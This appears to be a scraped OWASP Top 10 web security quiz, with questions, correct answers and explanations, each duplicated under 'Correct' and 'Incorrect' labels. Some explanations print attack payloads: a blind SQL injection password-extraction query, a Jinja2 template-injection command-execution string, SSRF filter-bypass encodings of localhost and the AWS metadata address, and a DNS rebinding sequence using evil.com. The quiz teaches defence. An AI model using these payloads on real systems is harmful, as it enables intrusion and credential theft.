Predictable session IDs are a critical Identification and Authentication Failure (A07:2021). If session tokens are sequential integers, an attacker can enumerate or predict other users' valid session IDs and impersonate them β bypassing authentication entirely without knowing their passwords. Session tokens must be: cryptographically random (CSPRNG), at least 128 bits of entropy, non-sequential, non-predictable, and invalidated on logout. Frameworks like Express-Session, Django, and Spring generate cryptographically secure session IDs by default β never implement custom session ID generation.
12What is the recommended cryptographic practice for storing user passwords to prevent "Cryptographic Failures" (A02)?
CorrectB: Salting them with a unique, per-user random value and hashing them using a slow, work-factor algorithm like Argon2id or bcrypt
OWASP recommends Argon2id as the first choice for password hashing (winner of the Password Hashing Competition). Alternatives: bcrypt (battle-tested, widely supported) and scrypt. Key properties required: (1) Slow by design β the high cost defeats brute-force; (2) Unique per-user salt β defeats rainbow tables and ensures two users with the same password have different hashes; (3) One-way β unlike AES encryption, hashing is irreversible (the application never needs the original plaintext again). Base64 is encoding, not cryptography. AES is reversible encryption β the key becomes a second target.
IncorrectB: Salting them with a unique, per-user random value and hashing them using a slow, work-factor algorithm like Argon2id or bcrypt
OWASP recommends Argon2id as the first choice for password hashing (winner of the Password Hashing Competition). Alternatives: bcrypt (battle-tested, widely supported) and scrypt. Key properties required: (1) Slow by design β the high cost defeats brute-force; (2) Unique per-user salt β defeats rainbow tables and ensures two users with the same password have different hashes; (3) One-way β unlike AES encryption, hashing is irreversible (the application never needs the original plaintext again). Base64 is encoding, not cryptography. AES is reversible encryption β the key becomes a second target.
13An attacker uploads a malicious software update disguised as a legitimate patch, which the server automatically installs without verifying its digital signature. Which OWASP category does this fall under?
CorrectC: Software and Data Integrity Failures
Software and Data Integrity Failures (A08:2021) explicitly covers scenarios where an application relies on untrusted sources for updates, plugins, or libraries without integrity verification. Auto-update functions that download and execute code without verifying a cryptographic signature (e.g., package checksum, GPG signature, code signing certificate) are critically vulnerable: an attacker who compromises the update distribution mechanism can push malicious code to every user. Real-world example: SolarWinds SUNBURST β a malicious update was signed with a valid certificate and distributed through the legitimate update mechanism.
IncorrectC: Software and Data Integrity Failures
Software and Data Integrity Failures (A08:2021) explicitly covers scenarios where an application relies on untrusted sources for updates, plugins, or libraries without integrity verification. Auto-update functions that download and execute code without verifying a cryptographic signature (e.g., package checksum, GPG signature, code signing certificate) are critically vulnerable: an attacker who compromises the update distribution mechanism can push malicious code to every user. Real-world example: SolarWinds SUNBURST β a malicious update was signed with a valid certificate and distributed through the legitimate update mechanism.
14Which HTTP response header is a primary defense against both Security Misconfiguration and Injection (XSS) attacks?
CorrectC: Content-Security-Policy (CSP)
Content-Security-Policy (CSP) is a powerful HTTP response header that instructs the browser to only load and execute content from explicitly approved sources. A strict CSP (script-src 'self') defeats XSS by blocking inline scripts and scripts from unauthorized origins β even if an attacker successfully injects a payload, the browser refuses to execute it. CSP also addresses: clickjacking (frame-ancestors directive), mixed content (upgrade-insecure-requests), and data exfiltration (connect-src). Not having CSP is itself a Security Misconfiguration finding.
IncorrectC: Content-Security-Policy (CSP)
Content-Security-Policy (CSP) is a powerful HTTP response header that instructs the browser to only load and execute content from explicitly approved sources. A strict CSP (script-src 'self') defeats XSS by blocking inline scripts and scripts from unauthorized origins β even if an attacker successfully injects a payload, the browser refuses to execute it. CSP also addresses: clickjacking (frame-ancestors directive), mixed content (upgrade-insecure-requests), and data exfiltration (connect-src). Not having CSP is itself a Security Misconfiguration finding.
15A company routinely deploys applications with default administrative credentials (e.g., admin/admin). Which OWASP category covers this flaw?
CorrectD: Security Misconfiguration
Default credentials on appliances, software, and cloud infrastructure are classified under Security Misconfiguration (A05:2021). This is one of the most exploited findings in penetration tests and red team assessments β default credentials for network equipment (Cisco, Juniper), CMS platforms (WordPress admin/admin), databases (MySQL root with blank password), and cloud services are widely published and actively scanned for by automated tools like Shodan. While default credentials could also suggest A07 (Auth Failures), OWASP specifically places "using default credentials for admin accounts" under Security Misconfiguration.
IncorrectD: Security Misconfiguration
Default credentials on appliances, software, and cloud infrastructure are classified under Security Misconfiguration (A05:2021). This is one of the most exploited findings in penetration tests and red team assessments β default credentials for network equipment (Cisco, Juniper), CMS platforms (WordPress admin/admin), databases (MySQL root with blank password), and cloud services are widely published and actively scanned for by automated tools like Shodan. While default credentials could also suggest A07 (Auth Failures), OWASP specifically places "using default credentials for admin accounts" under Security Misconfiguration.
16What is a "Supply Chain Attack" in the context of OWASP Vulnerable and Outdated Components (A06)?
CorrectC: An attacker compromising a trusted third-party library or software dependency that is then unknowingly imported by the target application
A supply chain attack targets the weakest link in the software procurement and build process: a trusted third-party dependency. Rather than attacking a hardened target directly, attackers compromise an upstream component. Examples: the event-stream NPM package was compromised via a malicious contributor (2018); the SolarWinds Orion build system was backdoored (2020); the XZ Utils library was backdoored via a social engineering campaign on an open-source maintainer (2024). Supply chain attacks are addressed by SBOMs (Software Bill of Materials), dependency pinning with hash verification, and signed commits.
IncorrectC: An attacker compromising a trusted third-party library or software dependency that is then unknowingly imported by the target application
A supply chain attack targets the weakest link in the software procurement and build process: a trusted third-party dependency. Rather than attacking a hardened target directly, attackers compromise an upstream component. Examples: the event-stream NPM package was compromised via a malicious contributor (2018); the SolarWinds Orion build system was backdoored (2020); the XZ Utils library was backdoored via a social engineering campaign on an open-source maintainer (2024). Supply chain attacks are addressed by SBOMs (Software Bill of Materials), dependency pinning with hash verification, and signed commits.
17How can "Security Logging and Monitoring Failures" (A09) escalate the severity of a cyberattack?
CorrectB: By allowing attackers to persist in the network for months without detection, maximizing the time available to exfiltrate data, map networks, and establish persistence
Security Logging and Monitoring Failures are particularly dangerous because they don't cause a breach themselves β they prevent the organization from detecting and responding to one. The IBM Cost of a Data Breach Report (2022) found the average time to identify a breach was 207 days, and an additional 70 days to contain it β 277 days total. During this "dwell time," attackers can: exfiltrate massive amounts of data, establish multiple persistence mechanisms (backdoors), map the internal network, and escalate privileges. Comprehensive logging, SIEM correlation, and active monitoring are critical to reducing dwell time.
IncorrectB: By allowing attackers to persist in the network for months without detection, maximizing the time available to exfiltrate data, map networks, and establish persistence
Security Logging and Monitoring Failures are particularly dangerous because they don't cause a breach themselves β they prevent the organization from detecting and responding to one. The IBM Cost of a Data Breach Report (2022) found the average time to identify a breach was 207 days, and an additional 70 days to contain it β 277 days total. During this "dwell time," attackers can: exfiltrate massive amounts of data, establish multiple persistence mechanisms (backdoors), map the internal network, and escalate privileges. Comprehensive logging, SIEM correlation, and active monitoring are critical to reducing dwell time.
18Which OWASP Top 10 category covers the failure to enforce HTTPS across an entire website, allowing sensitive data to be transmitted in plaintext?
CorrectB: Cryptographic Failures
Transmitting sensitive data over HTTP instead of HTTPS is a Cryptographic Failure (A02:2021) β specifically, the failure to apply cryptographic protection (TLS) to data in transit. An unencrypted HTTP connection allows any network observer (MitM attacker on shared Wi-Fi, malicious ISP, government surveillance) to read session cookies, passwords, and personal data in cleartext. HTTPS with HSTS (HTTP Strict Transport Security) prevents both unencrypted transmission and SSL-stripping downgrade attacks. Mixed content (HTTPS page loading HTTP resources) is also a Cryptographic Failure.
IncorrectB: Cryptographic Failures
Transmitting sensitive data over HTTP instead of HTTPS is a Cryptographic Failure (A02:2021) β specifically, the failure to apply cryptographic protection (TLS) to data in transit. An unencrypted HTTP connection allows any network observer (MitM attacker on shared Wi-Fi, malicious ISP, government surveillance) to read session cookies, passwords, and personal data in cleartext. HTTPS with HSTS (HTTP Strict Transport Security) prevents both unencrypted transmission and SSL-stripping downgrade attacks. Mixed content (HTTPS page loading HTTP resources) is also a Cryptographic Failure.
19What is a "Software Bill of Materials" (SBOM), and which OWASP category does it help mitigate?
CorrectB: A formal, machine-readable inventory detailing all third-party components, dependencies, and their versions in an application; mitigates Vulnerable and Outdated Components (A06)
An SBOM (Software Bill of Materials) is a formal, structured inventory of all components, libraries, and dependencies that make up a software application β similar to an ingredient list for food products. SBOMs enable: (1) rapid identification of affected components when a new CVE is published (e.g., "Is Log4j in any of our applications?"); (2) automated vulnerability scanning against CVE databases; (3) supply chain transparency for customers and regulators. The US Executive Order 14028 (2021) mandated SBOMs for software sold to US federal agencies. SBOMs directly mitigate A06.
IncorrectB: A formal, machine-readable inventory detailing all third-party components, dependencies, and their versions in an application; mitigates Vulnerable and Outdated Components (A06)
An SBOM (Software Bill of Materials) is a formal, structured inventory of all components, libraries, and dependencies that make up a software application β similar to an ingredient list for food products. SBOMs enable: (1) rapid identification of affected components when a new CVE is published (e.g., "Is Log4j in any of our applications?"); (2) automated vulnerability scanning against CVE databases; (3) supply chain transparency for customers and regulators. The US Executive Order 14028 (2021) mandated SBOMs for software sold to US federal agencies. SBOMs directly mitigate A06.
20Which of the following is a classic example of Broken Object Level Authorization (BOLA/IDOR) under Broken Access Control (A01)?
CorrectA: An attacker alters an API endpoint from /api/user/profile/55 to /api/user/profile/56 and reads another user's private data without authorization
BOLA (Broken Object Level Authorization) β also called IDOR (Insecure Direct Object Reference) β is the most common and impactful API security vulnerability. When an API endpoint uses user-controllable object identifiers (IDs) without verifying the requesting user is authorized to access that specific object, any user can access any other user's data by cycling through IDs. OWASP API Security Top 10 (2023) lists BOLA as #1. Option D describes a different Broken Access Control variant (mass assignment / price manipulation). Options B and C are different attack categories.
IncorrectA: An attacker alters an API endpoint from /api/user/profile/55 to /api/user/profile/56 and reads another user's private data without authorization
BOLA (Broken Object Level Authorization) β also called IDOR (Insecure Direct Object Reference) β is the most common and impactful API security vulnerability. When an API endpoint uses user-controllable object identifiers (IDs) without verifying the requesting user is authorized to access that specific object, any user can access any other user's data by cycling through IDs. OWASP API Security Top 10 (2023) lists BOLA as #1. Option D describes a different Broken Access Control variant (mass assignment / price manipulation). Options B and C are different attack categories.
OWASP Top 10 β Advanced
1In an SSRF attack targeting an internal cloud environment (A10), which sensitive endpoint do attackers frequently query to steal IAM credentials?
CorrectB: The AWS Instance Metadata Service at 169.254.169.254
The AWS Instance Metadata Service (IMDS) at http://169.254.169.254/latest/meta-data/ is the most high-value SSRF target in cloud environments. It is accessible from any EC2 instance but not from external networks β making SSRF the only way to reach it remotely. The metadata service exposes: IAM role credentials (access key + secret + session token), instance ID, security group rules, and user-data scripts. The Capital One breach (2019) exploited SSRF against this endpoint, leading to exfiltration of 100M+ customer records. AWS IMDSv2 (session-oriented requests) mitigates this by requiring a PUT request with a token before GET requests are accepted.
IncorrectB: The AWS Instance Metadata Service at 169.254.169.254
The AWS Instance Metadata Service (IMDS) at http://169.254.169.254/latest/meta-data/ is the most high-value SSRF target in cloud environments. It is accessible from any EC2 instance but not from external networks β making SSRF the only way to reach it remotely. The metadata service exposes: IAM role credentials (access key + secret + session token), instance ID, security group rules, and user-data scripts. The Capital One breach (2019) exploited SSRF against this endpoint, leading to exfiltration of 100M+ customer records. AWS IMDSv2 (session-oriented requests) mitigates this by requiring a PUT request with a token before GET requests are accepted.
2How does an attacker execute a "Blind SQL Injection" attack when the application returns no data or error messages?
CorrectC: By injecting a payload that triggers a time delay (e.g., SLEEP(10)) or a boolean response, inferring database content bit-by-bit when no data or errors are visible
Blind SQLi is used when an application is injectable but provides no visual feedback (no query results, no error messages). Two techniques: (1) Boolean-based Blind β inject conditions that change application behavior for true vs. false results (e.g., different page content); extract data character-by-character with binary search queries: id=1 AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--; (2) Time-based Blind β inject SLEEP(n) or WAITFOR DELAY and measure response time: true condition β delayed response; false β instant. Both are tediously slow but equally impactful. SQLMap automates both via the --technique=BT flag.
IncorrectC: By injecting a payload that triggers a time delay (e.g., SLEEP(10)) or a boolean response, inferring database content bit-by-bit when no data or errors are visible
Blind SQLi is used when an application is injectable but provides no visual feedback (no query results, no error messages). Two techniques: (1) Boolean-based Blind β inject conditions that change application behavior for true vs. false results (e.g., different page content); extract data character-by-character with binary search queries: id=1 AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--; (2) Time-based Blind β inject SLEEP(n) or WAITFOR DELAY and measure response time: true condition β delayed response; false β instant. Both are tediously slow but equally impactful. SQLMap automates both via the --technique=BT flag.
3Which of the following is a dangerous cryptographic failure specific to JSON Web Tokens (JWTs) under A02:2021?
CorrectD: The server accepting a JWT where the header specifies "alg": "none", allowing the attacker to bypass signature verification entirely
The alg:none attack is a critical JWT vulnerability: some JWT libraries allow tokens where alg is set to "none" (no signature algorithm), meaning no signature is required or verified. An attacker takes a legitimate JWT, decodes the Base64url header and payload, modifies claims (e.g., escalates role to admin), sets "alg":"none", removes the signature, resubmits the forged token. A vulnerable library skips verification and accepts it. Prevention: (1) explicitly whitelist accepted algorithms in JWT library configuration; (2) never trust the "alg" header from the token itself; (3) prefer asymmetric algorithms (RS256, ES256). This is a Cryptographic Failure (A02).
IncorrectD: The server accepting a JWT where the header specifies "alg": "none", allowing the attacker to bypass signature verification entirely
The alg:none attack is a critical JWT vulnerability: some JWT libraries allow tokens where alg is set to "none" (no signature algorithm), meaning no signature is required or verified. An attacker takes a legitimate JWT, decodes the Base64url header and payload, modifies claims (e.g., escalates role to admin), sets "alg":"none", removes the signature, resubmits the forged token. A vulnerable library skips verification and accepts it. Prevention: (1) explicitly whitelist accepted algorithms in JWT library configuration; (2) never trust the "alg" header from the token itself; (3) prefer asymmetric algorithms (RS256, ES256). This is a Cryptographic Failure (A02).
4What is a "Time-of-Check to Time-of-Use" (TOCTOU) race condition, and which OWASP category does it best align with?
CorrectB: A logic flaw where a security decision is made at one point in time, but the state of the resource changes before the action is executed, allowing the check to be invalidated β best aligned with Insecure Design (A04)
TOCTOU is a race condition design flaw: an application checks some condition (authentication, balance, quantity) at time T1, then acts on that check at time T2. If the state changes between T1 and T2 β because another thread or concurrent request modified it β the security check becomes invalid. Example: a user submits two simultaneous withdrawal requests; the balance check passes for both, but both are executed, overdrawing the account. This is an Insecure Design flaw (A04) requiring architectural solutions: atomic database transactions, database locks, idempotency keys, and concurrency-safe state management.
IncorrectB: A logic flaw where a security decision is made at one point in time, but the state of the resource changes before the action is executed, allowing the check to be invalidated β best aligned with Insecure Design (A04)
TOCTOU is a race condition design flaw: an application checks some condition (authentication, balance, quantity) at time T1, then acts on that check at time T2. If the state changes between T1 and T2 β because another thread or concurrent request modified it β the security check becomes invalid. Example: a user submits two simultaneous withdrawal requests; the balance check passes for both, but both are executed, overdrawing the account. This is an Insecure Design flaw (A04) requiring architectural solutions: atomic database transactions, database locks, idempotency keys, and concurrency-safe state management.
5Which advanced web attack exploits discrepancies in how front-end proxies and backend servers parse conflicting Content-Length and Transfer-Encoding headers?
CorrectC: HTTP Request Smuggling
HTTP Request Smuggling (discovered and popularized by James Kettle at PortSwigger) exploits inconsistency between a front-end proxy (reverse proxy, CDN, load balancer) and a back-end server in interpreting which of two conflicting headers β Content-Length and Transfer-Encoding: chunked β takes precedence. An attacker crafts a request that the proxy treats as one complete request but the back-end treats as two. The "smuggled" prefix is prepended to the next legitimate user's request. Impacts: WAF bypass, cache poisoning, credential hijacking, request queue capture, and Host header injection. This is a complex A03/A05 chained vulnerability.
IncorrectC: HTTP Request Smuggling
HTTP Request Smuggling (discovered and popularized by James Kettle at PortSwigger) exploits inconsistency between a front-end proxy (reverse proxy, CDN, load balancer) and a back-end server in interpreting which of two conflicting headers β Content-Length and Transfer-Encoding: chunked β takes precedence. An attacker crafts a request that the proxy treats as one complete request but the back-end treats as two. The "smuggled" prefix is prepended to the next legitimate user's request. Impacts: WAF bypass, cache poisoning, credential hijacking, request queue capture, and Host header injection. This is a complex A03/A05 chained vulnerability.
6How does the "Padding Oracle Attack" compromise cryptographic implementations under A02:2021?
CorrectD: It exploits verbose padding validation error messages from block cipher (CBC mode) implementations to decrypt ciphertext byte-by-byte without knowing the encryption key
The Padding Oracle Attack is a side-channel attack against CBC (Cipher Block Chaining) mode block cipher implementations. An attacker submits crafted ciphertext and observes whether the server returns a "padding error" (invalid padding) or "MAC error" / "decryption success." This one-bit oracle (valid/invalid padding) allows the attacker to reverse-engineer the plaintext byte by byte through purely mathematical manipulation β no key required. The POODLE attack (2014) exploited this against SSL 3.0. Mitigation: use authenticated encryption modes (AES-GCM, AES-CCM) which validate integrity before decryption.
IncorrectD: It exploits verbose padding validation error messages from block cipher (CBC mode) implementations to decrypt ciphertext byte-by-byte without knowing the encryption key
The Padding Oracle Attack is a side-channel attack against CBC (Cipher Block Chaining) mode block cipher implementations. An attacker submits crafted ciphertext and observes whether the server returns a "padding error" (invalid padding) or "MAC error" / "decryption success." This one-bit oracle (valid/invalid padding) allows the attacker to reverse-engineer the plaintext byte by byte through purely mathematical manipulation β no key required. The POODLE attack (2014) exploited this against SSL 3.0. Mitigation: use authenticated encryption modes (AES-GCM, AES-CCM) which validate integrity before decryption.
7If an attacker exploits an "Insecure Deserialization" vulnerability (A08) using a "Gadget Chain", what are they doing?
CorrectA: Leveraging a sequence of existing, legitimate classes within the application's classpath that, when instantiated during deserialization, chain together to execute malicious code (Remote Code Execution)
A Gadget Chain exploits the deserialization process by constructing a payload that leverages existing, already-loaded classes (gadgets) in the application's classpath. The attacker doesn't need to inject new code β they use existing legitimate classes like Java's InvokerTransformer, CommonsCollections library gadgets, or Spring framework classes. When the deserialization engine processes the crafted object graph, it calls methods on these chained gadgets in sequence, eventually executing an OS command (Runtime.exec()). Discovered and weaponized for Java by researchers at Foxglove Security (2015). Libraries like Apache Commons Collections, Spring, and Groovy are common gadget sources.
IncorrectA: Leveraging a sequence of existing, legitimate classes within the application's classpath that, when instantiated during deserialization, chain together to execute malicious code (Remote Code Execution)
A Gadget Chain exploits the deserialization process by constructing a payload that leverages existing, already-loaded classes (gadgets) in the application's classpath. The attacker doesn't need to inject new code β they use existing legitimate classes like Java's InvokerTransformer, CommonsCollections library gadgets, or Spring framework classes. When the deserialization engine processes the crafted object graph, it calls methods on these chained gadgets in sequence, eventually executing an OS command (Runtime.exec()). Discovered and weaponized for Java by researchers at Foxglove Security (2015). Libraries like Apache Commons Collections, Spring, and Groovy are common gadget sources.
8How do attackers commonly bypass naive SSRF denylists that block "127.0.0.1" or "localhost" (A10)?
CorrectB: By using alternative IP representations: decimal (2130706433), IPv6 (::1), URL encoding (%31%32%37%2e%30%2e%30%2e%31), or DNS rebinding with a custom domain resolving to 127.0.0.1
Denylist-based SSRF filters are notoriously easy to bypass. 127.0.0.1 in alternative representations: decimal (2130706433), hex (0x7f000001), octal (0177.0.0.1), mixed (127.0.1), IPv6 (::1 or ::ffff:127.0.0.1 or [::1]). DNS rebinding provides a subtler bypass: an attacker registers a domain with a very short TTL; the filter-checl resolves it to a safe external IP, but then the TTL expires and the DNS resolves to 127.0.0.1 when the actual HTTP request is made. AWS Metadata also has alternatives: http://2852039166/ (decimal), http://[::ffff:169.254.169.254/]. OWASP recommends allowlisting over denylisting.
IncorrectB: By using alternative IP representations: decimal (2130706433), IPv6 (::1), URL encoding (%31%32%37%2e%30%2e%30%2e%31), or DNS rebinding with a custom domain resolving to 127.0.0.1
Denylist-based SSRF filters are notoriously easy to bypass. 127.0.0.1 in alternative representations: decimal (2130706433), hex (0x7f000001), octal (0177.0.0.1), mixed (127.0.1), IPv6 (::1 or ::ffff:127.0.0.1 or [::1]). DNS rebinding provides a subtler bypass: an attacker registers a domain with a very short TTL; the filter-checl resolves it to a safe external IP, but then the TTL expires and the DNS resolves to 127.0.0.1 when the actual HTTP request is made. AWS Metadata also has alternatives: http://2852039166/ (decimal), http://[::ffff:169.254.169.254/]. OWASP recommends allowlisting over denylisting.
9What is "Dependency Confusion" (also called "Dependency Squatting") in the context of Software and Data Integrity Failures (A08)?
CorrectC: An attacker publishing a malicious package with the same name as a company's private internal library to a public registry (npm, PyPI), tricking the build system into downloading the attacker's version
Dependency Confusion (discovered by Alex Birsan in 2021) exploits the way package managers resolve internal vs. public package names. When a build system looks for package "company-internal-tool" (a private package), it may check public registries (npm, PyPI, RubyGems) first, or alongside, the private one. An attacker registers "company-internal-tool" in the public registry with a higher version number; the build system downloads the attacker's malicious version instead of the legitimate internal one. Birsan exploited this against Apple, Microsoft, and PayPal, achieving RCE in all three. Mitigation: use namespace scoping (@company/package), pin exact dependency hashes, and configure package managers for private-only resolution for internal packages.
IncorrectC: An attacker publishing a malicious package with the same name as a company's private internal library to a public registry (npm, PyPI), tricking the build system into downloading the attacker's version
Dependency Confusion (discovered by Alex Birsan in 2021) exploits the way package managers resolve internal vs. public package names. When a build system looks for package "company-internal-tool" (a private package), it may check public registries (npm, PyPI, RubyGems) first, or alongside, the private one. An attacker registers "company-internal-tool" in the public registry with a higher version number; the build system downloads the attacker's malicious version instead of the legitimate internal one. Birsan exploited this against Apple, Microsoft, and PayPal, achieving RCE in all three. Mitigation: use namespace scoping (@company/package), pin exact dependency hashes, and configure package managers for private-only resolution for internal packages.
10What is "Server-Side Template Injection" (SSTI), and which OWASP category does it fall under?
CorrectB: Injecting native template syntax into a web template engine (like Jinja2 or Twig) that is unsafely incorporated into user input, evaluated server-side, and leading to Remote Code Execution β under Injection (A03)
SSTI (Server-Side Template Injection) falls under Injection (A03:2021). It occurs when user-supplied data is embedded directly into a server-side template that is then rendered by a template engine (Jinja2, Twig, FreeMarker, Pebble, Velocity, Smarty). Injecting template-native syntax β {{7*7}} in Jinja2, ${7*7} in FreeMarker, #{7*7} in Pebble β is the detection test (receiving "49" confirms execution). From there, attackers escalate to RCE via Python's object hierarchy: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}. Commonly confused with Reflected XSS during initial testing. Prevention: never pass user input as template content; use a logic-less template engine (Mustache).
IncorrectB: Injecting native template syntax into a web template engine (like Jinja2 or Twig) that is unsafely incorporated into user input, evaluated server-side, and leading to Remote Code Execution β under Injection (A03)
SSTI (Server-Side Template Injection) falls under Injection (A03:2021). It occurs when user-supplied data is embedded directly into a server-side template that is then rendered by a template engine (Jinja2, Twig, FreeMarker, Pebble, Velocity, Smarty). Injecting template-native syntax β {{7*7}} in Jinja2, ${7*7} in FreeMarker, #{7*7} in Pebble β is the detection test (receiving "49" confirms execution). From there, attackers escalate to RCE via Python's object hierarchy: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}. Commonly confused with Reflected XSS during initial testing. Prevention: never pass user input as template content; use a logic-less template engine (Mustache).
11Which of the following describes a "Second-Order SQL Injection"?
CorrectD: The attacker injects a payload that is safely stored in the database as data, but a separate, vulnerable backend process later uses that stored value in an unsafe SQL query, triggering the injection at execution time
Second-Order (or Stored) SQL Injection is particularly deceptive: the input layer may correctly parameterize and "safely" store the attacker's payload in the database. However, a separate backend process (background job, admin panel, data export function, stored procedure) later retrieves this value and uses it in an unsafe SQL query via string concatenation β triggering the injection. For example, an attacker registers with username admin'-- ; the registration is safe. Later, a password-reset query assembles: "UPDATE users SET pwd='...' WHERE user='"+username+"'" β now the injection fires. Detected by DAST tools that test data persistence flows, not just input layers.
IncorrectD: The attacker injects a payload that is safely stored in the database as data, but a separate, vulnerable backend process later uses that stored value in an unsafe SQL query, triggering the injection at execution time
Second-Order (or Stored) SQL Injection is particularly deceptive: the input layer may correctly parameterize and "safely" store the attacker's payload in the database. However, a separate backend process (background job, admin panel, data export function, stored procedure) later retrieves this value and uses it in an unsafe SQL query via string concatenation β triggering the injection. For example, an attacker registers with username admin'-- ; the registration is safe. Later, a password-reset query assembles: "UPDATE users SET pwd='...' WHERE user='"+username+"'" β now the injection fires. Detected by DAST tools that test data persistence flows, not just input layers.
12What is "Cross-Site WebSocket Hijacking" (CSWSH)?
CorrectC: A vulnerability where a server fails to validate the Origin header during a WebSocket handshake, allowing a malicious site to establish a connection and communicate as the authenticated victim user
Cross-Site WebSocket Hijacking (CSWSH) is a WebSocket-specific CSRF variant. Unlike XMLHttpRequest, browsers do not enforce the Same-Origin Policy for WebSocket connections β they send cookies with WebSocket handshake requests to any origin. If the server doesn't validate the Origin header on the WebSocket upgrade request, a malicious page can establish a WebSocket connection to the target application, which attaches the victim's session cookies, giving the attacker a full bidirectional channel as the authenticated user. The attacker can receive real-time data and send messages. Prevention: validate the Origin header server-side; use CSRF tokens in the WebSocket handshake URL.
IncorrectC: A vulnerability where a server fails to validate the Origin header during a WebSocket handshake, allowing a malicious site to establish a connection and communicate as the authenticated victim user
Cross-Site WebSocket Hijacking (CSWSH) is a WebSocket-specific CSRF variant. Unlike XMLHttpRequest, browsers do not enforce the Same-Origin Policy for WebSocket connections β they send cookies with WebSocket handshake requests to any origin. If the server doesn't validate the Origin header on the WebSocket upgrade request, a malicious page can establish a WebSocket connection to the target application, which attaches the victim's session cookies, giving the attacker a full bidirectional channel as the authenticated user. The attacker can receive real-time data and send messages. Prevention: validate the Origin header server-side; use CSRF tokens in the WebSocket handshake URL.
13How does a "DNS Rebinding" attack facilitate an advanced SSRF bypass?
CorrectA: A malicious DNS server initially resolves to a safe external IP (passing SSRF filters), then rebinds to a restricted internal IP (127.0.0.1) when the application actually makes the HTTP request after the TTL expires
DNS Rebinding bypasses time-of-check vs. time-of-use (TOCTOU) in SSRF URL validation: (1) Attacker registers evil.com and sets a very short TTL (1 second) with DNS response A=legitimate_external_ip; (2) Application validates the URL β evil.com resolves to external IP, passes the SSRF denylist check; (3) TTL expires in 1 second; (4) Application makes the actual HTTP request β evil.com now resolves to 127.0.0.1 or 169.254.169.254; (5) The request hits the internal resource. Mitigation: re-validate the resolved IP against the denylist at connection time (after DNS resolution), not just at validation time; use socket-level IP binding, as tools like SSRF Proxy do.
IncorrectA: A malicious DNS server initially resolves to a safe external IP (passing SSRF filters), then rebinds to a restricted internal IP (127.0.0.1) when the application actually makes the HTTP request after the TTL expires
DNS Rebinding bypasses time-of-check vs. time-of-use (TOCTOU) in SSRF URL validation: (1) Attacker registers evil.com and sets a very short TTL (1 second) with DNS response A=legitimate_external_ip; (2) Application validates the URL β evil.com resolves to external IP, passes the SSRF denylist check; (3) TTL expires in 1 second; (4) Application makes the actual HTTP request β evil.com now resolves to 127.0.0.1 or 169.254.169.254; (5) The request hits the internal resource. Mitigation: re-validate the resolved IP against the denylist at connection time (after DNS resolution), not just at validation time; use socket-level IP binding, as tools like SSRF Proxy do.
14In advanced Access Control testing (A01), what is the difference between horizontal and vertical privilege escalation?
CorrectC: Horizontal escalation involves accessing data belonging to another user with the same privilege level; vertical escalation involves acquiring a higher privilege level (e.g., standard user to administrator)
Two distinct Broken Access Control (A01) exploitation patterns: (1) Horizontal Privilege Escalation β "sideways" access to another user's resources at the same privilege tier. Example: user A accessing user B's invoices by changing ?invoice_id=456 to ?invoice_id=457. The attacker gains no new privileges, just access to others' data. (2) Vertical Privilege Escalation β "upward" access to a higher privilege tier. Example: a standard user discovers a hidden /admin/delete endpoint and successfully calls it because there's no server-side role check. Both require the same fix: server-side authorization checks on every operation, verifying the caller's role/ownership before execution.
IncorrectC: Horizontal escalation involves accessing data belonging to another user with the same privilege level; vertical escalation involves acquiring a higher privilege level (e.g., standard user to administrator)
Two distinct Broken Access Control (A01) exploitation patterns: (1) Horizontal Privilege Escalation β "sideways" access to another user's resources at the same privilege tier. Example: user A accessing user B's invoices by changing ?invoice_id=456 to ?invoice_id=457. The attacker gains no new privileges, just access to others' data. (2) Vertical Privilege Escalation β "upward" access to a higher privilege tier. Example: a standard user discovers a hidden /admin/delete endpoint and successfully calls it because there's no server-side role check. Both require the same fix: server-side authorization checks on every operation, verifying the caller's role/ownership before execution.
15What is the critical risk of a "Log Injection" (CRLF Injection) vulnerability under Security Logging Failures (A09)?
CorrectC: An attacker inputs carriage return/line feed (\r\n) characters to forge false log entries, erase evidence of malicious activity, or execute XSS if logs are rendered in a vulnerable web-based log viewer dashboard
CRLF Injection (Log Injection) exploits the failure to sanitize CR (\r, 0x0D) and LF (\n, 0x0A) characters in log-written user data. Since log files are line-based, injecting \r\n allows an attacker to: (1) Insert fake log entries β e.g., forge a "successful login for admin" entry to mislead incident responders; (2) Delete evidence β overwrite or confuse the log analysis; (3) Execute XSS β if the logs are displayed in a web-based SIEM or log viewer without output encoding, injected HTML/JS executes in the admin's browser. This undermines the integrity and reliability of audit trails, which are critical for forensic investigations and compliance (PCI DSS, HIPAA).
IncorrectC: An attacker inputs carriage return/line feed (\r\n) characters to forge false log entries, erase evidence of malicious activity, or execute XSS if logs are rendered in a vulnerable web-based log viewer dashboard
CRLF Injection (Log Injection) exploits the failure to sanitize CR (\r, 0x0D) and LF (\n, 0x0A) characters in log-written user data. Since log files are line-based, injecting \r\n allows an attacker to: (1) Insert fake log entries β e.g., forge a "successful login for admin" entry to mislead incident responders; (2) Delete evidence β overwrite or confuse the log analysis; (3) Execute XSS β if the logs are displayed in a web-based SIEM or log viewer without output encoding, injected HTML/JS executes in the admin's browser. This undermines the integrity and reliability of audit trails, which are critical for forensic investigations and compliance (PCI DSS, HIPAA).
16In automated DevSecOps pipelines, what is the primary difference between SAST and DAST?
CorrectD: SAST (Static Application Security Testing) analyzes source code without executing it; DAST (Dynamic Application Security Testing) interacts with the running application from the outside, simulating an external attacker
SAST (Static Application Security Testing) analyzes the application's source code, bytecode, or binary without executing it β finding vulnerabilities "from the inside": hardcoded secrets, SQL string concatenation, unsafe deserialization patterns, path traversal, etc. It runs early in SDLC (code review stage). DAST (Dynamic Application Security Testing) attacks the running application like an external hacker β sending malformed requests, fuzzing inputs, manipulating cookies β finding runtime vulnerabilities invisible in source code: authentication bypasses, session management flaws, server configuration issues. Modern DevSecOps integrates both. Tools: SAST (SonarQube, Checkmarx, Semgrep), DAST (OWASP ZAP, Burp Suite, Invicti).
IncorrectD: SAST (Static Application Security Testing) analyzes source code without executing it; DAST (Dynamic Application Security Testing) interacts with the running application from the outside, simulating an external attacker
